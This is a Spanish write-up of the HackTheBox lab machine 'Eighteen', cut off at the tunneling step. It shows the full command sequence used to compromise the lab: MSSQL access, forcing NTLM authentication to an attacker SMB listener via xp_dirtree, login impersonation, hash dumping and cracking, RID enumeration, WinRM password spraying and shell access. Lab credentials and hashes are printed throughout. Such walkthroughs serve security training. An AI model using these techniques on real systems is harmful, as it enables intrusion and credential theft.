Eighteen expone el servicio MSSQL donde, descubrimos credenciales que permitieron el acceso por WinRM. Se ejecuto ligolo para exponer los puertos locales. Al enumerar los permisos del usuario, se identifico una configuracion de permisos en Active Directory que permitio realizar el ataque BadSuccessor, logrando la escalada de privilegios.

Nombre	Eighteen
OS	Windows
Puntos	20
Dificultad	Easy
Fecha de Salida	2025-11-15
IP	10.129.121.22
Maker	kavigihan
Rated	{ "type": "bar", "data": { "labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"], "datasets": [{ "label": "User Rated Difficulty", "data": [192, 208, 1007, 1107, 666, 372, 363, 134, 43, 138], "backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"] }] }, "options": { "scales": { "xAxes": [{"display": false}], "yAxes": [{"display": false}] }, "legend": {"labels": {"fontColor": "white"}}, "responsive": true } }

Machine Information: Certified

La descripcion de la maquina emula una situacion “real” de un pentest proporcionando credenciales.

As is common in real life Windows penetration tests, you will start the Eighteen box with credentials for the following account: kevin / iNa2we6haRj2gaw!

Recon

nmap

nmap muestra multiples puertos abiertos: http (80), mssql (1433) y winrm (5985).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41


# Nmap 7.95 scan initiated Sat Nov 15 14:13:40 2025 as: /usr/lib/nmap/nmap --privileged -p80,1433,5985 -sV -sC -oN nmap_scan 10.129.121.22
Nmap scan report for 10.129.121.22
Host is up (0.066s latency).

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info: 
|   10.129.121.22:1433: 
|     Version: 
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-16T02:45:47
|_Not valid after:  2055-11-16T02:45:47
| ms-sql-ntlm-info: 
|   10.129.121.22:1433: 
|     Target_Name: EIGHTEEN
|     NetBIOS_Domain_Name: EIGHTEEN
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: eighteen.htb
|     DNS_Computer_Name: DC01.eighteen.htb
|     DNS_Tree_Name: eighteen.htb
|_    Product_Version: 10.0.26100
|_ssl-date: 2025-11-16T03:13:55+00:00; +7h00m01s from scanner time.
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 15 14:13:54 2025 -- 1 IP address (1 host up) scanned in 13.96 seconds

Agregamos a nuestro archivo /etc/hosts los valores eighteen.htb dc01.eighteen.htb.

Service Access

Las credenciales tienen acceso por mssql.

1
2
3
4


❯ netexec mssql eighteen.htb -u kevin -p 'iNa2we6haRj2gaw!' --local-auth
MSSQL       10.129.121.22   1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL       10.129.121.22   1433   DC01             [+] DC01\kevin:iNa2we6haRj2gaw! 
❯

Web Site

Los headers indican un servidor Microsoft-IIS.

1
2
3
4
5
6
7
8
9


❯ curl -sI eighteen.htb
HTTP/1.1 200 OK
Content-Length: 2253
Content-Type: text/html; charset=utf-8
Vary: Cookie
Server: Microsoft-IIS/10.0
Date: Sun, 16 Nov 2025 04:48:22 GMT

❯ 

El sitio muestra una tematica financiera.

Explica como funciona.

Existen dos formularios, para registro y login.

Directory Brute Forcing

feroxbuster muestra que existe /admin.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35


❯ feroxbuster -u http://eighteen.htb/ -w $CM
                                                                                                                                                                                        
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://eighteen.htb/
 🚩  In-Scope Url          │ eighteen.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirb/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        5l       31w      207c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      603l     1072w     9601c http://eighteen.htb/static/css/style.css
200      GET       76l      145w     2421c http://eighteen.htb/register
200      GET       88l      203w     2822c http://eighteen.htb/features
200      GET       66l      121w     1961c http://eighteen.htb/login
200      GET       74l      156w     2253c http://eighteen.htb/
302      GET        5l       22w      199c http://eighteen.htb/admin => http://eighteen.htb/login
302      GET        5l       22w      199c http://eighteen.htb/dashboard => http://eighteen.htb/login
302      GET        5l       22w      189c http://eighteen.htb/logout => http://eighteen.htb/
404      GET       29l       95w     1245c http://eighteen.htb/lost+found
404      GET       29l       95w     1245c http://eighteen.htb/web.config
[####################] - 8s      4622/4622    0s      found:10      errors:0      
[####################] - 8s      4614/4614    593/s   http://eighteen.htb/
❯ 

User Register

Se realizo un registr de usuario.

No se encontro nada relevante en el sitio.

MSSQL

Ingresamos por mssql con las credenciales iniciales.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


❯ impacket-mssqlclient -dc-ip 10.129.121.22 -p 1433 kevin:'iNa2we6haRj2gaw!'@eighteen.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (kevin  guest@master)> select user_name();
        
-----   
guest   

SQL (kevin  guest@master)>

Grab the Hash

Utilizamos xp_dirtree para obtener el hash del usuario svc.

1
2
3
4


SQL (kevin  guest@master)> xp_dirtree \\10.10.14.64\sc\
subdirectory   depth   file   
------------   -----   ----   
SQL (kevin  guest@master)>

responder muestra al usuario mssqlsvc junto con el hash NTLM.

1
2
3
4
5


[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.121.22
[SMB] NTLMv2-SSP Username : EIGHTEEN\mssqlsvc
[SMB] NTLMv2-SSP Hash     : mssqlsvc::EIGHTEEN:8fbce4abfccb9959:2434A5789FE8FE438791855270C7A670:010100000000000000A33FE64356DC0131FCCA0DEE6B2D6F000000000200080049004E004800390001001E00570049004E002D004200310039004400330048003900330031003700310004003400570049004E002D00420031003900440033004800390033003100370031002E0049004E00480039002E004C004F00430041004C000300140049004E00480039002E004C004F00430041004C000500140049004E00480039002E004C004F00430041004C000700080000A33FE64356DC01060004000200000008003000300000000000000000000000003000009C07F4FB3F07BFA27372E4956B39E593B11C21756FB871CDACE6DEBF1C226ED30A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00360034000000000000000000

Cracking the Hash

Tras intentar crackear el hash, este no fue encontrado en el wordlist rockyo.

1
2
3
4
5
6
7
8


❯ john SMB-NTLMv2-SSP-10.129.121.22.txt --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:06 DONE (2025-11-15 15:26) 0g/s 2066Kp/s 4133Kc/s 4133KC/s !)(OPPQR..*7¡Vamos!
Session completed. 
❯

DB Access

Encontramos que existe la base de datos financial_planner sin embargo, kevin no tiene acceso a esta.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16


SQL (kevin  guest@master)> enum_db
name                is_trustworthy_on   
-----------------   -----------------   
master                              0   

tempdb                              0   

model                               0   

msdb                                1   

financial_planner                   0   

SQL (kevin  guest@master)> use financial_planner
ERROR(DC01): Line 1: The server principal "kevin" is not able to access the database "financial_planner" under the current security context.
SQL (kevin  guest@master)>

enum_logins muestra que existe un login para appdev. Utilizamos exec_as_login con este usuario para tener acceso a la base de datos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


SQL (kevin  guest@master)> enum_logins
name     type_desc   is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin   
------   ---------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------   
sa       SQL_LOGIN             0          1               0             0            0              0           0           0           0   

kevin    SQL_LOGIN             0          0               0             0            0              0           0           0           0   

appdev   SQL_LOGIN             0          0               0             0            0              0           0           0           0   

SQL (kevin  guest@master)> exec_as_login appdev
SQL (appdev  appdev@master)> use financial_planner
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev  appdev@financial_planner)>

Existe la tabla users, dentro encontramos el hash de contrasena para el usuario admin.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21


SQL (appdev  appdev@financial_planner)> SELECT name FROM sys.tables WHERE type_desc = 'USER_TABLE';
name          
-----------   
users         

incomes       

expenses      

allocations   

analytics     

visits        

SQL (appdev  appdev@financial_planner)> select * from users;
  id   full_name   username   email                password_hash                                                                                            is_admin   created_at   
----   ---------   --------   ------------------   ------------------------------------------------------------------------------------------------------   --------   ----------   
1002   admin       admin      admin@eighteen.htb   pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133          1   2025-10-29 05:39:03   

SQL (appdev  appdev@financial_planner)>

Cracking the Hash

Formateamos el hash similar a HTB - Titanic para poder ejecutar hashcat.

1
2
3
4


# pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133
❯ digest=$(echo "0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133" | xxd -r -p | base64); salt=$(echo "AMtzteQIG7yAbZIa" | base64); echo "sha256:60000:${salt}:${digest}"
sha256:60000:QU10enRlUUlHN3lBYlpJYQo=:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=
❯ 

Ejecutamos hashcat con el wordlist rockyou.txt sobre el archivo de hash. Este muestra la contrasena en texto plano.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35


PS C:\Users\user\Documents\github\hashcat-7.1.2> ./hashcat.exe -m 10900 'sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=' rockyou.txt
hashcat (v7.1.2) starting

# [.. cut ..]

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=:iloveyou1

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10900 (PBKDF2-HMAC-SHA256)
Hash.Target......: sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7Gd...yIcTM=
Time.Started.....: Sat Nov 15 16:48:33 2025 (9 secs)
Time.Estimated...: Sat Nov 15 16:48:42 2025 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........:     2780 H/s (7.33ms) @ Accel:2 Loops:500 Thr:512 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 24576/14344385 (0.17%)
Rejected.........: 0/24576 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:599500-599999
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> 280789
Hardware.Mon.#01.: Temp: 59c Fan: 30% Util: 99% Core:2760MHz Mem:8251MHz Bus:8

Started: Sat Nov 15 16:48:32 2025
Stopped: Sat Nov 15 16:48:43 2025
PS C:\Users\user\Documents\github\hashcat-7.1.2>

Admin - Website

Las credenciales dan acceso al dashboard del sitio.

El sitio muestra unicamente un usuario registrado.

Enumerating Users

Utilizamos el modulo auxiliar mssql_enum_domain_accounts para la enumeracion de usuarios a traves de MSSQL.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65


msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > show options

Module options (auxiliary/admin/mssql/mssql_enum_domain_accounts):

   Name                 Current Setting   Required  Description
   ----                 ---------------   --------  -----------
   FuzzNum              10000             yes       Number of principal_ids to fuzz.
   PASSWORD             iNa2we6haRj2gaw!  no        The password for the specified username
   RHOSTS               eighteen.htb      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                1433              yes       The target port (TCP)
   USERNAME             kevin             no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false             yes       Use windows authentication (requires DOMAIN option set)


View the full module info with the info, or info -d command.

msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > run
[*] Running module against 10.129.78.214
[*] 10.129.78.214:1433 - Attempting to connect to the database server at 10.129.78.214:1433 as kevin...
[+] 10.129.78.214:1433 - Connected.
[*] 10.129.78.214:1433 - SQL Server Name: DC01
[*] 10.129.78.214:1433 - Domain Name: EIGHTEEN
[+] 10.129.78.214:1433 - Found the domain sid: 010500000000000515000000dfdeac44d4131d236f599b76
[*] 10.129.78.214:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.129.78.214:1433 -  - EIGHTEEN\Administrator
[*] 10.129.78.214:1433 -  - EIGHTEEN\Guest
[*] 10.129.78.214:1433 -  - EIGHTEEN\krbtgt
[*] 10.129.78.214:1433 -  - EIGHTEEN\Domain Admins
[*] 10.129.78.214:1433 -  - EIGHTEEN\Domain Users
[*] 10.129.78.214:1433 -  - EIGHTEEN\Domain Guests
[*] 10.129.78.214:1433 -  - EIGHTEEN\Domain Computers
[*] 10.129.78.214:1433 -  - EIGHTEEN\Domain Controllers
[*] 10.129.78.214:1433 -  - EIGHTEEN\Cert Publishers
[*] 10.129.78.214:1433 -  - EIGHTEEN\Schema Admins
[*] 10.129.78.214:1433 -  - EIGHTEEN\Enterprise Admins
[*] 10.129.78.214:1433 -  - EIGHTEEN\Group Policy Creator Owners
[*] 10.129.78.214:1433 -  - EIGHTEEN\Read-only Domain Controllers
[*] 10.129.78.214:1433 -  - EIGHTEEN\Cloneable Domain Controllers
[*] 10.129.78.214:1433 -  - EIGHTEEN\Protected Users
[*] 10.129.78.214:1433 -  - EIGHTEEN\Key Admins
[*] 10.129.78.214:1433 -  - EIGHTEEN\Enterprise Key Admins
[*] 10.129.78.214:1433 -  - EIGHTEEN\Forest Trust Accounts
[*] 10.129.78.214:1433 -  - EIGHTEEN\External Trust Accounts
[*] 10.129.78.214:1433 -  - EIGHTEEN\RAS and IAS Servers
[*] 10.129.78.214:1433 -  - EIGHTEEN\Allowed RODC Password Replication Group
[*] 10.129.78.214:1433 -  - EIGHTEEN\Denied RODC Password Replication Group
[*] 10.129.78.214:1433 -  - EIGHTEEN\DC01$
[*] 10.129.78.214:1433 -  - EIGHTEEN\DnsAdmins
[*] 10.129.78.214:1433 -  - EIGHTEEN\DnsUpdateProxy
[*] 10.129.78.214:1433 -  - EIGHTEEN\mssqlsvc
[*] 10.129.78.214:1433 -  - EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
[*] 10.129.78.214:1433 -  - EIGHTEEN\HR
[*] 10.129.78.214:1433 -  - EIGHTEEN\IT
[*] 10.129.78.214:1433 -  - EIGHTEEN\Finance
[*] 10.129.78.214:1433 -  - EIGHTEEN\jamie.dunn
[*] 10.129.78.214:1433 -  - EIGHTEEN\jane.smith
[*] 10.129.78.214:1433 -  - EIGHTEEN\alice.jones
[*] 10.129.78.214:1433 -  - EIGHTEEN\adam.scott
[*] 10.129.78.214:1433 -  - EIGHTEEN\bob.brown
[*] 10.129.78.214:1433 -  - EIGHTEEN\carol.white
[*] 10.129.78.214:1433 -  - EIGHTEEN\dave.green
[+] 10.129.78.214:1433 - 38 user accounts, groups, and computer accounts were found.
[*] 10.129.78.214:1433 - Query results have been saved to: /home/kali/.msf4/loot/20251115170845_default_10.129.78.214_mssql.domain.acc_504033.txt
[*] Auxiliary module execution completed
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) >

Creamos un wordlist con los usuarios y grupos encontrados.

1
2
3
4


❯ cat /home/kali/.msf4/loot/20251115170845_default_10.129.78.214_mssql.domain.acc_504033.txt | grep EIGHTEEN | cut -d '\' -f2 | cut -d '"' -f1  > user_group.txt
❯ wc -l user_group.txt
37 user_group.txt
❯

Password Spraying

Ejecutamos netexec con los usuarios/grupos y la contrasena anterior encontrada a WinRM logrando obtener un par aceptado.

1
2
3


❯ netexec winrm eighteen.htb -u user_group.txt -p 'iloveyou1' 2>/dev/null | grep '[+]'
WINRM                    10.129.78.214   5985   DC01             [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)
❯

User - Adam.Scott

Ejecutamos winrmexec con las credenciales logrado acceder a la maquina y la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


❯ python ../winrmexec/winrmexec.py -dc-ip 10.129.78.214 adam.scott:iloveyou1@eighteen.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] '-target_ip' not specified, using eighteen.htb
[*] '-port' not specified, using 5985
[*] '-url' not specified, using http://eighteen.htb:5985/wsman
PS C:\Users\adam.scott\Documents> whoami
eighteen\adam.scott
PS C:\Users\adam.scott\Documents> cat ../Desktop/user.txt
62afe8508a58357cac88b1a98954f6a6
PS C:\Users\adam.scott\Documents>

Web App - Source Code

En C:\inetpub\eighteen.htb descubrimos el codigo fuente del sitio.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16


PS C:\> dir -force inetpub/eighteen.htb


    Directory: C:\inetpub\eighteen.htb


Mode                 LastWriteTime         Length Name                                                                  
----                 -------------         ------ ----                                                                  
d-----        10/27/2025   1:12 PM                static                                                                
d-----         11/8/2025   6:29 AM                templates                                                             
-a----         11/8/2025   6:49 AM          10646 app.py                                                                
-a----        10/27/2025   1:15 PM             57 requirements.txt                                                      
-a----        11/10/2025  12:18 PM            611 web.config                                                            


PS C:\>

Existe un par de credenciales (appdev:MissThisElite$90) para la base de datos.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323


from flask import Flask, render_template, request, redirect, url_for, session, flash
from werkzeug.security import generate_password_hash, check_password_hash
from functools import wraps
import pyodbc
from datetime import datetime
import os

app = Flask(__name__)
app.secret_key = os.urandom(24)
app.config['SESSION_TYPE'] = 'filesystem'

DB_CONFIG = {
    'server': 'dc01.eighteen.htb',
    'database': 'financial_planner',
    'username': 'appdev',
    'password': 'MissThisElite$90',
    'driver': '{ODBC Driver 17 for SQL Server}',
    'TrustServerCertificate': 'True'
}

def get_db_connection():
    conn_str = f"DRIVER={DB_CONFIG['driver']};SERVER={DB_CONFIG['server']};DATABASE={DB_CONFIG['database']};UID={DB_CONFIG['username']};PWD={DB_CONFIG['password']}"
    return pyodbc.connect(conn_str)

def login_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'user_id' not in session:
            flash('Please log in to access this page.', 'warning')
            return redirect(url_for('login'))
        return f(*args, **kwargs)
    return decorated_function

def admin_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'user_id' not in session:
            flash('Please log in to access this page.', 'warning')
            return redirect(url_for('login'))

        conn = get_db_connection()
        cursor = conn.cursor()
        cursor.execute("SELECT is_admin FROM users WHERE id = ?", (session['user_id'],))
        user = cursor.fetchone()
        conn.close()

        if not user or not user[0]:
            flash('Access denied. Admin privileges required.', 'danger')
            return redirect(url_for('dashboard'))
        return f(*args, **kwargs)
    return decorated_function

def track_visit(page):
    try:
        conn = get_db_connection()
        cursor = conn.cursor()
        user_agent = request.headers.get('User-Agent', 'Unknown')
        cursor.execute(
            "INSERT INTO visits (user_agent, visited_page, timestamp) VALUES (?, ?, ?)",
            (user_agent, page, datetime.now())
        )
        conn.commit()
        conn.close()
    except:
        pass

@app.route('/')
def index():
    track_visit('/')
    return render_template('index.html')

@app.route('/features')
def features():
    track_visit('/features')
    return render_template('features.html')

@app.route('/register', methods=['GET', 'POST'])
def register():
    track_visit('/register')
    if request.method == 'POST':
        full_name = request.form['full_name']
        username = request.form['username']
        email = request.form['email']
        password = request.form['password']

        password_hash = generate_password_hash(password, 'pbkdf2')

        try:
            conn = get_db_connection()
            cursor = conn.cursor()
            cursor.execute(
                "INSERT INTO users (full_name, username, email, password_hash, is_admin, created_at) VALUES (?, ?, ?, ?, 0, ?)",
                (full_name, username, email, password_hash, datetime.now())
            )
            conn.commit()
            conn.close()
            flash('Registration successful! Please log in.', 'success')
            return redirect(url_for('login'))
        except Exception as e:
            flash(f'Registration failed. Username or email may already exist. {e}', 'danger')
            return redirect(url_for('register'))

    return render_template('register.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    track_visit('/login')
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']

        conn = get_db_connection()
        cursor = conn.cursor()
        cursor.execute("SELECT id, password_hash, full_name FROM users WHERE username = ?", (username,))
        user = cursor.fetchone()
        conn.close()

        if user and check_password_hash(user[1], password):
            session['user_id'] = user[0]
            session['username'] = username
            session['full_name'] = user[2]
            flash(f'Welcome back, {user[2]}!', 'success')
            return redirect(url_for('dashboard'))
        else:
            flash('Invalid username or password.', 'danger')

    return render_template('login.html')

@app.route('/logout')
def logout():
    session.clear()
    flash('You have been logged out.', 'info')
    return redirect(url_for('index'))

@app.route('/dashboard')
@login_required
def dashboard():
    track_visit('/dashboard')
    user_id = session['user_id']

    conn = get_db_connection()
    cursor = conn.cursor()

    cursor.execute("SELECT monthly_salary, yearly_salary FROM incomes WHERE user_id = ? ORDER BY created_at DESC", (user_id,))
    income = cursor.fetchone()

    cursor.execute("SELECT id, category, type, value FROM expenses WHERE user_id = ?", (user_id,))
    expenses = cursor.fetchall()

    cursor.execute("SELECT savings, investments FROM allocations WHERE user_id = ? ORDER BY created_at DESC", (user_id,))
    allocation = cursor.fetchone()

    conn.close()

    monthly_salary = income[0] if income else 0
    yearly_salary = income[1] if income else 0

    total_expenses = 0
    expense_list = []
    for exp in expenses:
        exp_id, category, exp_type, value = exp
        if exp_type == 'fixed':
            amount = value
        else:
            amount = (value / 100) * monthly_salary
        total_expenses += amount
        expense_list.append({
            'id': exp_id,
            'category': category,
            'type': exp_type,
            'value': value,
            'amount': amount
        })

    remaining = monthly_salary - total_expenses
    savings = allocation[0] if allocation else 0
    investments = allocation[1] if allocation else 0

    return render_template('dashboard.html',
                         monthly_salary=monthly_salary,
                         yearly_salary=yearly_salary,
                         expenses=expense_list,
                         total_expenses=total_expenses,
                         remaining=remaining,
                         savings=savings,
                         investments=investments)

@app.route('/update_income', methods=['POST'])
@login_required
def update_income():
    user_id = session['user_id']
    monthly_salary = float(request.form['monthly_salary'])
    yearly_salary = monthly_salary * 12

    conn = get_db_connection()
    cursor = conn.cursor()

    cursor.execute("SELECT id FROM incomes WHERE user_id = ?", (user_id,))
    existing = cursor.fetchone()

    if existing:
        cursor.execute(
            "UPDATE incomes SET monthly_salary = ?, yearly_salary = ? WHERE user_id = ?",
            (monthly_salary, yearly_salary, user_id)
        )
    else:
        cursor.execute(
            "INSERT INTO incomes (user_id, monthly_salary, yearly_salary, created_at) VALUES (?, ?, ?, ?)",
            (user_id, monthly_salary, yearly_salary, datetime.now())
        )

    conn.commit()
    conn.close()

    flash('Income updated successfully!', 'success')
    return redirect(url_for('dashboard'))

@app.route('/add_expense', methods=['POST'])
@login_required
def add_expense():
    user_id = session['user_id']
    category = request.form['category']
    exp_type = request.form['type']
    value = float(request.form['value'])

    conn = get_db_connection()
    cursor = conn.cursor()
    cursor.execute(
        "INSERT INTO expenses (user_id, category, type, value, created_at) VALUES (?, ?, ?, ?, ?)",
        (user_id, category, exp_type, value, datetime.now())
    )
    conn.commit()
    conn.close()

    flash('Expense added successfully!', 'success')
    return redirect(url_for('dashboard'))

@app.route('/delete_expense/<int:expense_id>', methods=['POST'])
@login_required
def delete_expense(expense_id):
    user_id = session['user_id']

    conn = get_db_connection()
    cursor = conn.cursor()
    cursor.execute("DELETE FROM expenses WHERE id = ? AND user_id = ?", (expense_id, user_id))
    conn.commit()
    conn.close()

    flash('Expense deleted successfully!', 'success')
    return redirect(url_for('dashboard'))

@app.route('/update_allocation', methods=['POST'])
@login_required
def update_allocation():
    user_id = session['user_id']
    savings = float(request.form['savings'])
    investments = float(request.form['investments'])

    conn = get_db_connection()
    cursor = conn.cursor()

    cursor.execute("SELECT id FROM allocations WHERE user_id = ?", (user_id,))
    existing = cursor.fetchone()

    if existing:
        cursor.execute(
            "UPDATE allocations SET savings = ?, investments = ? WHERE user_id = ?",
            (savings, investments, user_id)
        )
    else:
        cursor.execute(
            "INSERT INTO allocations (user_id, savings, investments, created_at) VALUES (?, ?, ?, ?)",
            (user_id, savings, investments, datetime.now())
        )

    conn.commit()
    conn.close()

    flash('Allocation updated successfully!', 'success')
    return redirect(url_for('dashboard'))

@app.route('/admin')
@admin_required
def admin():
    track_visit('/admin')

    conn = get_db_connection()
    cursor = conn.cursor()

    cursor.execute("SELECT COUNT(*) FROM users")
    total_users = cursor.fetchone()[0]

    cursor.execute("SELECT COUNT(*) FROM visits")
    total_visits = cursor.fetchone()[0]

    cursor.execute("SELECT COUNT(*) FROM expenses")
    total_expenses_count = cursor.fetchone()[0]
    avg_expenses = total_expenses_count / total_users if total_users > 0 else 0

    cursor.execute("SELECT AVG(savings), AVG(investments) FROM allocations")
    allocation_avg = cursor.fetchone()
    avg_savings = allocation_avg[0] if allocation_avg[0] else 0
    avg_investments = allocation_avg[1] if allocation_avg[1] else 0

    cursor.execute("SELECT category, COUNT(*) as count FROM expenses GROUP BY category ORDER BY count DESC")
    top_categories = cursor.fetchall()[:5]

    cursor.execute("SELECT full_name, username, email, created_at FROM users ORDER BY created_at DESC")
    recent_users = cursor.fetchall()[:5]

    conn.close()

    return render_template('admin.html',
                         total_users=total_users,
                         total_visits=total_visits,
                         avg_expenses=avg_expenses,
                         avg_savings=avg_savings,
                         avg_investments=avg_investments,
                         top_categories=top_categories,
                         recent_users=recent_users)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

Tunneling

Localmente observamos que exiten otros puertos abiertos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
